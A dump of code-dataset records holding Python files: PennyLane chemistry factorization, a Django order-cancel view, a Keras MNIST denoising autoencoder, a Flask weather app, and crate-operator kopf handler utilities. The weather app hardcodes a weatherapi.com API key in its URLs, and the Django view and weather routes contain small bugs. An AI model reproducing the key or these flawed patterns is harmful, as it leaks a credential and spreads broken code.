\\chi^*_{r}(x_2) \\chi_{r}(x_1) \\chi_{s}(x_2)}{|x_1 - x_2|} dx_1 dx_2,\n\n where both :math:`\\chi_{r}(x_1)` and :math:`\\chi_{r}(x_2)` will have same spin functions, i.e.,\n :math:`\\chi_{r}(x_i) = \\phi(r_i)\\alpha(\\omega)` or :math:`\\chi_{r}(x_i) = \\phi(r_i)\\beta(\\omega)`\\ . These are added to the one-electron\n integral tensor :math:`h_{pq}` to compute :math:`T_{pq}`\\ .\n\n \"\"\"\n\n chemist_two_body_coeffs, chemist_one_body_coeffs = None, None\n\n if one_body_tensor is not None:\n chemist_one_body_coeffs = one_body_tensor.copy()\n\n if two_body_tensor is not None:\n chemist_two_body_coeffs = np.swapaxes(two_body_tensor, 1, 3)\n one_body_coeffs = -np.einsum(\"prrs\", chemist_two_body_coeffs)\n\n if chemist_one_body_coeffs is None:\n chemist_one_body_coeffs = np.zeros_like(one_body_coeffs)\n\n if spatial_basis:\n chemist_two_body_coeffs = 0.5 * chemist_two_body_coeffs\n one_body_coeffs = 0.5 * one_body_coeffs\n\n chemist_one_body_coeffs += one_body_coeffs\n\n return (x for x in [chemist_one_body_coeffs, chemist_two_body_coeffs] if x is not None)\n", "repo_name": "PennyLaneAI/pennylane", "sub_path": "pennylane/qchem/factorization.py", "file_name": "factorization.py", "file_ext": "py", "file_size_in_byte": 17404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1965, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pennylane.numpy.linalg.eigh", "line_number": 129, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pennylane.numpy", "line_number": 129, "usage_type": "name"}, {"api_name": "pennylane.numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 130, "usage_type": "name"}, {"api_name": "pennylane.numpy.diag", "line_number": 139, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 139, "usage_type": "name"}, {"api_name": "pennylane.numpy.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "pennylane.numpy.array", "line_number": 142, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 142, "usage_type": "name"}, {"api_name": "pennylane.numpy.linalg.eigh", "line_number": 144, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg", "line_number": 144, "usage_type": "attribute"}, {"api_name": "pennylane.numpy", "line_number": 144, "usage_type": "name"}, {"api_name": "pennylane.numpy.sum", "line_number": 152, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 152, "usage_type": "name"}, {"api_name": "pennylane.numpy.kron", "line_number": 270, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 270, "usage_type": "name"}, {"api_name": "pennylane.numpy.eye", "line_number": 270, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg.eigh", "line_number": 271, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pennylane.numpy", "line_number": 271, "usage_type": "name"}, {"api_name": "pennylane.numpy.kron", "line_number": 274, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 274, "usage_type": "name"}, {"api_name": "pennylane.numpy.eye", "line_number": 274, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg.eigh", "line_number": 276, "usage_type": "call"}, {"api_name": "pennylane.numpy.linalg", "line_number": 276, "usage_type": "attribute"}, {"api_name": "pennylane.numpy", "line_number": 276, "usage_type": "name"}, {"api_name": "pennylane.numpy.argsort", "line_number": 277, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 277, "usage_type": "name"}, {"api_name": "pennylane.Identity", "line_number": 283, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 283, "usage_type": "call"}, {"api_name": "pennylane.Identity", "line_number": 295, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 296, "usage_type": "call"}, {"api_name": "pennylane.PauliZ", "line_number": 297, "usage_type": "call"}, {"api_name": "pennylane.pauli.pauli_mult_with_phase", "line_number": 298, "usage_type": "call"}, {"api_name": "pennylane.pauli", "line_number": 298, "usage_type": "attribute"}, {"api_name": "pennylane.PauliZ", "line_number": 298, "usage_type": "call"}, {"api_name": "pennylane.numpy.swapaxes", "line_number": 380, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 380, "usage_type": "name"}, {"api_name": "pennylane.numpy.einsum", "line_number": 381, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 381, "usage_type": "name"}, {"api_name": "pennylane.numpy.zeros_like", "line_number": 384, "usage_type": "call"}, {"api_name": "pennylane.numpy", "line_number": 384, "usage_type": "name"}]} +{"seq_id": "70144643366", "text": "from django.utils.translation import gettext_lazy as _\nfrom rest_framework import generics, status\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\n\nfrom apps.order.api_endpoints.Cancel.serializers import DriverOrderCancelSerializer\nfrom apps.order.models import Order, Trip\nfrom helpers.permissions import CustomDriverPermission\n\n\nclass OrderCancelView(generics.GenericAPIView):\n serializer_class = DriverOrderCancelSerializer\n permission_classes = CustomDriverPermission\n\n def get_queryset(self):\n trip, _ = Trip.objects.get_or_create(status=Trip.TripStatus.ACTIVE, driver=self.request.user.driver)\n return trip\n\n def post(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n order = serializer.validated_data[\"order\"]\n trip = self.get_queryset()\n\n if order.type == Order.OrderType.PERSON:\n if trip.client.filter(id=order.id).exists():\n trip.client.remove(order) # removing from driver's trip\n order.canceled_by_driver() # returning to the requested state\n return Response({\"message\": _(\"Successfully removed\")}, status=status.HTTP_200_OK)\n else:\n raise ValidationError(detail={\"order\": _(\"Order does not exist on your trip\")}, code=\"not_found\")\n\n else:\n if trip.delivery.filter(id=order.id).exists():\n trip.delivery.remove(order)\n order.canceled_by_driver()\n return Response({\"message\": _(\"Successfully removed\")}, status=status.HTTP_200_OK)\n else:\n raise ValidationError(detail={\"order\": _(\"Order does not exist on your trip\")}, code=\"not_found\")\n\n\n__all__ = [\"OrderCancelView\"]\n", "repo_name": "khodjiyev2o/tranzit.uz", "sub_path": "apps/order/api_endpoints/Cancel/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.generics.GenericAPIView", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 11, "usage_type": "name"}, {"api_name": "apps.order.api_endpoints.Cancel.serializers.DriverOrderCancelSerializer", "line_number": 12, "usage_type": "name"}, {"api_name": "helpers.permissions.CustomDriverPermission", "line_number": 13, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 16, "usage_type": "name"}, {"api_name": "apps.order.models.Trip.objects.get_or_create", "line_number": 16, "usage_type": "call"}, {"api_name": "apps.order.models.Trip.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "apps.order.models.Trip", "line_number": 16, "usage_type": "name"}, {"api_name": "apps.order.models.Trip.TripStatus", "line_number": 16, "usage_type": "attribute"}, {"api_name": "apps.order.models.Order.OrderType", "line_number": 25, "usage_type": "attribute"}, {"api_name": "apps.order.models.Order", "line_number": 25, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 29, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 29, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 29, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 31, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 37, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 37, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 37, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 39, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "28337133788", "text": "'''Trains a denoising autoencoder on MNIST dataset.\n\nDenoising is one of the classic applications of autoencoders.\nThe denoising process removes unwanted noise that corrupted the\ntrue data.\n\nNoise + Data ---> Denoising Autoencoder ---> Data\n\nGiven a training dataset of corrupted data as input and\ntrue data as output, a denoising autoencoder can recover the\nhidden structure to generate clean data.\n\nThis example has modular design. The encoder, decoder and autoencoder\nare 3 models that share weights. For example, after training the\nautoencoder, the encoder can be used to generate latent vectors\nof input data for low-dim visualization like PCA or TSNE.\n'''\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.keras.layers import Dense, Input\nfrom tensorflow.keras.layers import Conv2D, Flatten\nfrom tensorflow.keras.layers import Reshape, Conv2DTranspose\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.datasets import mnist\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nnp.random.seed(1337)\n\n# load MNIST dataset\n(x_train, _), (x_test, _) = mnist.load_data()\n\n# reshape to (28, 28, 1) and normalize input images\nimage_size = x_train.shape[1]\nx_train = np.reshape(x_train, [-1, image_size, image_size, 1])\nx_test = np.reshape(x_test, [-1, image_size, image_size, 1])\nx_train = x_train.astype('float32') / 255\nx_test = x_test.astype('float32') / 255\n\n# generate corrupted MNIST images by adding noise with normal dist\n# centered at 0.5 and std=0.5\nnoise = np.random.normal(loc=0.5, scale=0.5, size=x_train.shape)\nx_train_noisy = x_train + noise\nnoise = np.random.normal(loc=0.5, scale=0.5, size=x_test.shape)\nx_test_noisy = x_test + noise\n\n# adding noise may exceed normalized pixel values>1.0 or <0.0\n# clip pixel values >1.0 to 1.0 and <0.0 to 0.0\nx_train_noisy = np.clip(x_train_noisy, 0., 1.)\nx_test_noisy = np.clip(x_test_noisy, 0., 1.)\n\n# network parameters\ninput_shape = (image_size, image_size, 1)\nbatch_size = 32\nkernel_size = 3\nlatent_dim = 16\n# encoder/decoder number of CNN layers and filters per layer\nlayer_filters = [32, 64]\n\n# build the autoencoder model\n# first build the encoder model\ninputs = Input(shape=input_shape, name='encoder_input')\nx = inputs\n\n# stack of Conv2D(32)-Conv2D(64)\nfor filters in layer_filters:\n x = Conv2D(filters=filters,\n kernel_size=kernel_size,\n strides=2,\n activation='relu',\n padding='same')(x)\n\n# shape info needed to build decoder model so we don't do hand computation\n# the input to the decoder's first Conv2DTranspose will have this shape\n# shape is (7, 7, 64) which can be processed by the decoder back to (28, 28, 1)\nshape = K.int_shape(x)\n\n# generate the latent vector\nx = Flatten()(x)\nlatent = Dense(latent_dim, name='latent_vector')(x)\n\n# instantiate encoder model\nencoder = Model(inputs, latent, name='encoder')\nencoder.summary()\n\n# build the decoder model\nlatent_inputs = Input(shape=(latent_dim,), name='decoder_input')\n# use the shape (7, 7, 64) that was earlier saved\nx = Dense(shape[1] * shape[2] * shape[3])(latent_inputs)\n# from vector to suitable shape for transposed conv\nx = Reshape((shape[1], shape[2], shape[3]))(x)\n\n# stack of Conv2DTranspose(64)-Conv2DTranspose(32)\nfor filters in layer_filters[::-1]:\n x = Conv2DTranspose(filters=filters,\n kernel_size=kernel_size,\n strides=2,\n activation='relu',\n padding='same')(x)\n\n# reconstruct the denoised input\noutputs = Conv2DTranspose(filters=1,\n kernel_size=kernel_size,\n padding='same',\n activation='sigmoid',\n name='decoder_output')(x)\n\n# instantiate decoder model\ndecoder = Model(latent_inputs, outputs, name='decoder')\ndecoder.summary()\n\n# autoencoder = encoder + decoder\n# instantiate autoencoder model\nautoencoder = Model(inputs, decoder(encoder(inputs)), name='autoencoder')\nautoencoder.summary()\n\n# Mean Square Error (MSE) loss function, Adam optimizer\nautoencoder.compile(loss='mse', optimizer='adam')\n\n# train the autoencoder\nautoencoder.fit(x_train_noisy,\n x_train,\n validation_data=(x_test_noisy, x_test),\n epochs=10,\n batch_size=batch_size)\n\n# predict the autoencoder output from corrupted test images\nx_decoded = autoencoder.predict(x_test_noisy)\n\n# 3 sets of images with 9 MNIST digits\n# 1st rows - original images\n# 2nd rows - images corrupted by noise\n# 3rd rows - denoised images\nrows, cols = 3, 9\nnum = rows * cols\nimgs = np.concatenate([x_test[:num], x_test_noisy[:num], x_decoded[:num]])\nimgs = imgs.reshape((rows * 3, cols, image_size, image_size))\nimgs = np.vstack(np.split(imgs, rows, axis=1))\nimgs = imgs.reshape((rows * 3, -1, image_size, image_size))\nimgs = np.vstack([np.hstack(i) for i in imgs])\nimgs = (imgs * 255).astype(np.uint8)\nplt.figure()\nplt.axis('off')\nplt.title('Original images: top rows, '\n 'Corrupted Input: middle rows, '\n 'Denoised Input: third rows')\nplt.imshow(imgs, interpolation='none', cmap='gray')\nImage.fromarray(imgs).save('corrupted_and_denoised.png')\nplt.show()\n", "repo_name": "PacktPublishing/Advanced-Deep-Learning-with-Keras", "sub_path": "chapter3-autoencoders/denoising-autoencoder-mnist-3.3.1.py", "file_name": "denoising-autoencoder-mnist-3.3.1.py", "file_ext": "py", "file_size_in_byte": 5329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1645, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.seed", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.datasets.mnist.load_data", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets.mnist", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend.int_shape", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras.backend", "line_number": 81, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Reshape", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2DTranspose", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2DTranspose", "line_number": 107, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 114, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.split", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 146, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 153, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "38951854960", "text": "import json\nimport requests\nfrom flask import Flask\nfrom flask import render_template, redirect, url_for, flash, request\nfrom weather import app\nfrom weather.forms import Searchform\n@app.route('/',methods=['GET','POST'])\n@app.route('/home',methods=['GET','POST'])\ndef home_view():\n cities = ['Dhaka','Mumbai','Lahore','New York','London','Paris','Colombo','Rome','Munich','Stockholm']\n result = []\n feels_like = []\n resulth = []\n wind = []\n sky_status = []\n for city in cities:\n final_url = f'http://api.weatherapi.com/v1/current.json?key=eda33b43c4b344ca886161433222401&q={city}'\n dt = requests.get(final_url)\n data = dt.json()\n print(data)\n wt1 = data['current']['temp_c']\n wt2 = data['current']['humidity']\n wt3 = data['current']['feelslike_c']\n wt4 = data['current']['wind_kph']\n wt5 = data['current']['condition']['text'] \n result.append(wt1)\n resulth.append(wt2)\n result.append(wt1)\n resulth.append(wt2)\n feels_like.append(wt3)\n wind.append(wt4)\n sky_status.append(wt5)\n print(wt1)\n return render_template('home.html',title='Home page',temperatures=result,humidities=resulth,wind=wind,feels_like=feels_like,condition=sky_status,cities=cities)\n\n@app.route('/location',methods=['GET','POST'])\ndef get_location_update():\n form = Searchform()\n location = None\n r = False\n result = []\n feels_like = []\n resulth = []\n wind = []\n sky_status = []\n fr = []\n if request.method == 'POST':\n location = request.form.get('location')\n if location:\n final_url = f'http://api.weatherapi.com/v1/current.json?key=eda33b43c4b344ca886161433222401&q={location}'\n dt = requests.get(final_url)\n data = dt.json()\n print(data)\n if 'error' in data:\n flash(f'City name is not valid. Please provide a valid city','danger')\n else:\n wt1 = data['current']['temp_c']\n wt2 = data['current']['humidity']\n wt3 = data['current']['feelslike_c']\n wt4 = data['current']['wind_kph']\n wt5 = data['current']['condition']['text'] \n result.append(wt1)\n resulth.append(wt2)\n feels_like.append(wt3)\n wind.append(wt4)\n sky_status.append(wt5)\n fr.append(result)\n fr.append(resulth)\n fr.append(feels_like)\n fr.append(wind)\n fr.append(sky_status)\n r = True\n redirect (url_for('get_location_update'))\n else:\n flash(f'An error occured. Please try again')\n \n return render_template('specific.html',r=r,form=form,location = location,fr=fr)\n \n\n", "repo_name": "Tareq69/Weather_update_app_using_Flask", "sub_path": "weather/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 2846, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "weather.app.route", "line_number": 7, "usage_type": "call"}, {"api_name": "weather.app", "line_number": 7, "usage_type": "name"}, {"api_name": "weather.app.route", "line_number": 8, "usage_type": "call"}, {"api_name": "weather.app", "line_number": 8, "usage_type": "name"}, {"api_name": "weather.forms.Searchform", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 77, "usage_type": "call"}, {"api_name": "weather.app.route", "line_number": 36, "usage_type": "call"}, {"api_name": "weather.app", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "71656489765", "text": "import abc\nimport functools\nimport json\nimport logging\nfrom functools import wraps\nfrom typing import Any, Callable, Optional, TypedDict\n\nimport kopf\n\nfrom crate.operator.exceptions import SubHandlerFailedDependencyError\nfrom crate.operator.webhooks import (\n WebhookEvent,\n WebhookStatus,\n WebhookSubPayload,\n webhook_client,\n)\n\nfrom ..config import config\nfrom ..constants import KOPF_STATE_STORE_PREFIX\n\n\ndef subhandler_partial(awaitable: Callable, *args, **kwargs):\n \"\"\"\n A utility function to create a partial coroutine suitable for ``kopf.register``.\n\n When scheduling asynchronous sub-handlers in Kopf, one needs to be careful\n to not create coroutines when they're not used in an execution cycle.\n\n >>> async def some_coro(arg1, kwarg1=None):\n ... pass\n >>> kopf.register(\n ... fn=subhandler_partial(\n ... some_coro,\n ... 'abc',\n ... kwarg1='foo',\n ... ),\n ... id=\"some-id\",\n ... )\n \"\"\"\n\n @wraps(awaitable)\n async def _wrapper(**_):\n return await awaitable(*args, **kwargs)\n\n return _wrapper\n\n\nclass Notification(TypedDict):\n event: WebhookEvent\n payload: WebhookSubPayload\n status: WebhookStatus\n\n\nclass StateBasedSubHandler(abc.ABC):\n \"\"\"\n A handler capable of waiting for other handlers to finish.\n\n This can be expressed as a set of dependencies passed to the ``depends_on``\n parameter of the constructor.\n\n Basically, we wrap an actual handler here. Before executing the actual one,\n we check if the dependencies have completed yet - we do this by checking\n the statuses of those dependent handlers, as stored in the ``status`` field\n of the CrateDB resource.\n \"\"\"\n\n def __init__(\n self,\n namespace: str,\n name: str,\n ref: str,\n context: dict,\n depends_on=None,\n run_on_dep_failures=False,\n ):\n \"\"\"\n Constructs a new dependency-aware handler.\n\n :param namespace: the namespace to use\n :param name: the name of the CrateDB resource we're working on\n :param ref: reference for the current execution run.\n :param context: a dict allowing storage of status info between executions.\n :param depends_on: list of dependent handler this handler should wait for.\n :param run_on_dep_failures: whether we should still execute if our dependencies\n have failed. This is useful for handlers that clean up resources after\n other handlers have finished, and always need to run.\n \"\"\"\n self.namespace = namespace\n self.name = name\n self.ref = ref\n self._context = context\n self.depends_on = depends_on if depends_on is not None else []\n self.run_on_dep_failures = run_on_dep_failures\n\n def __call__(self, **kwargs: Any):\n return functools.partial(self._subhandler, **kwargs)\n\n async def _subhandler(self, **kwargs: Any):\n status = kwargs[\"status\"]\n annotations = kwargs[\"annotations\"]\n logger = kwargs[\"logger\"]\n waiting_for = []\n for dependency in self.depends_on:\n if self._get_status(status, dependency, logger) is None:\n if self._should_run_on_failed_dependency(\n annotations, dependency, logger\n ):\n continue\n\n waiting_for.append(dependency)\n\n if len(waiting_for) > 0:\n wt = \",\".join(waiting_for)\n # If running in testing mode (i.e. running ITs) we can reduce the delay\n # significantly as things generally move fast.\n raise kopf.TemporaryError(\n f\"Waiting for '{wt}'.\", delay=5 if config.TESTING else 30\n )\n\n try:\n res = await self.handle(**kwargs)\n return {\"success\": True, \"ref\": self.ref, \"result\": res}\n except Exception as e:\n if isinstance(e, kopf.TemporaryError) or isinstance(e, kopf.PermanentError):\n raise\n # The message gets sent to the k8s event log, and exc_info is found in\n # the main log of the operator. It's useful to have the message in\n # the event log too, as that one is easier to follow.\n logger.exception(f\"Uncaught exception in handler: {e}\", exc_info=e)\n raise\n\n @abc.abstractmethod\n async def handle(self, **kwargs: Any):\n raise NotImplementedError()\n\n def schedule_notification(\n self,\n event: WebhookEvent,\n payload: WebhookSubPayload,\n status: WebhookStatus,\n ):\n self._context.setdefault(\"notifications\", []).append(\n Notification(event=event, payload=payload, status=status)\n )\n\n async def send_registered_notifications(self, logger: logging.Logger):\n for notification in self._context.get(\"notifications\", []):\n await self.send_notification_now(\n logger,\n WebhookEvent(notification[\"event\"]),\n notification[\"payload\"],\n WebhookStatus(notification[\"status\"]),\n )\n self._context.get(\"notifications\", []).clear()\n\n async def send_notification_now(\n self,\n logger: logging.Logger,\n event: WebhookEvent,\n payload: WebhookSubPayload,\n status: WebhookStatus,\n ):\n await send_webhook_notification(\n self.namespace, self.name, logger, event, payload, status\n )\n\n def _get_status(self, statuses: dict, dependency: str, logger) -> Optional[dict]:\n \"\"\"\n Get the status of the specified dependency, obeying the ref.\n \"\"\"\n status = statuses.get(dependency, None)\n if not status:\n return None\n\n if status.get(\"ref\", None) != self.ref:\n logger.debug(\n \"Ignoring status for '%s' from previous run: %s\", dependency, status\n )\n return None\n\n return status\n\n def _should_run_on_failed_dependency(\n self, annotations: dict, handler_name: str, logger: logging.Logger\n ) -> bool:\n \"\"\"\n There is no way in kopf to say if a certain handler has failed or not.\n\n What we are doing instead is peeking into kopf's internal state storage -\n the annotations on the CrateDB objects to check if the handler has failed.\n\n Slightly naughty, but there is no better way at the time of writing.\n \"\"\"\n # Use the same procedure as kopf to create the handler name for the\n # annotations lookup. Important if the handler name exceeds the maximum\n # allowed length of 63 chars which is likely for @kopf.on.field() handlers\n # that have the field path in the name.\n progressor = kopf.AnnotationsProgressStorage(\n v1=False, prefix=KOPF_STATE_STORE_PREFIX\n )\n key = progressor.make_v2_key(handler_name)\n status_str = annotations.get(key)\n if not status_str:\n return False\n status = json.loads(status_str)\n if not status[\"success\"] and status[\"failure\"]:\n if self.run_on_dep_failures:\n logger.warning(\n f\"Our dependency ({handler_name}) has failed but we'll still run.\"\n )\n return True\n else:\n raise SubHandlerFailedDependencyError(\n f\"A dependency ({handler_name}) has failed. Giving up.\"\n )\n\n return False\n\n\nasync def send_webhook_notification(\n namespace: str,\n name: str,\n logger: logging.Logger,\n event: WebhookEvent,\n payload: WebhookSubPayload,\n status: WebhookStatus,\n):\n notification = Notification(event=event, payload=payload, status=status)\n logger.info(\n \"Sending %s notification event %s with payload %s\",\n notification[\"status\"],\n notification[\"event\"],\n notification[\"payload\"],\n )\n await webhook_client.send_notification(\n namespace,\n name,\n notification[\"event\"],\n notification[\"payload\"],\n notification[\"status\"],\n logger,\n )\n", "repo_name": "crate/crate-operator", "sub_path": "crate/operator/utils/kopf.py", "file_name": "kopf.py", "file_ext": "py", "file_size_in_byte": 8186, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Callable", "line_number": 22, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 41, "usage_type": "call"}, {"api_name": "typing.TypedDict", "line_number": 48, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookEvent", "line_number": 49, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookSubPayload", "line_number": 50, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookStatus", "line_number": 51, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 54, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 95, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 96, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 98, "usage_type": "name"}, {"api_name": "kopf.TemporaryError", "line_number": 116, "usage_type": "call"}, {"api_name": "config.config.TESTING", "line_number": 117, "usage_type": "attribute"}, {"api_name": "config.config", "line_number": 117, "usage_type": "name"}, {"api_name": "kopf.TemporaryError", "line_number": 124, "usage_type": "attribute"}, {"api_name": "kopf.PermanentError", "line_number": 124, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 133, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 132, "usage_type": "attribute"}, {"api_name": "crate.operator.webhooks.WebhookEvent", "line_number": 138, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookSubPayload", "line_number": 139, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookStatus", "line_number": 140, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 146, "usage_type": "attribute"}, {"api_name": "crate.operator.webhooks.WebhookEvent", "line_number": 150, "usage_type": "call"}, {"api_name": "crate.operator.webhooks.WebhookStatus", "line_number": 152, "usage_type": "call"}, {"api_name": "logging.Logger", "line_number": 158, "usage_type": "attribute"}, {"api_name": "crate.operator.webhooks.WebhookEvent", "line_number": 159, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookSubPayload", "line_number": 160, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookStatus", "line_number": 161, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 167, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 184, "usage_type": "attribute"}, {"api_name": "kopf.AnnotationsProgressStorage", "line_number": 198, "usage_type": "call"}, {"api_name": "constants.KOPF_STATE_STORE_PREFIX", "line_number": 199, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 205, "usage_type": "call"}, {"api_name": "crate.operator.exceptions.SubHandlerFailedDependencyError", "line_number": 213, "usage_type": "call"}, {"api_name": "logging.Logger", "line_number": 223, "usage_type": "attribute"}, {"api_name": "crate.operator.webhooks.WebhookEvent", "line_number": 224, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookSubPayload", "line_number": 225, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookStatus", "line_number": 226, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.webhook_client.send_notification", "line_number": 235, "usage_type": "call"}, 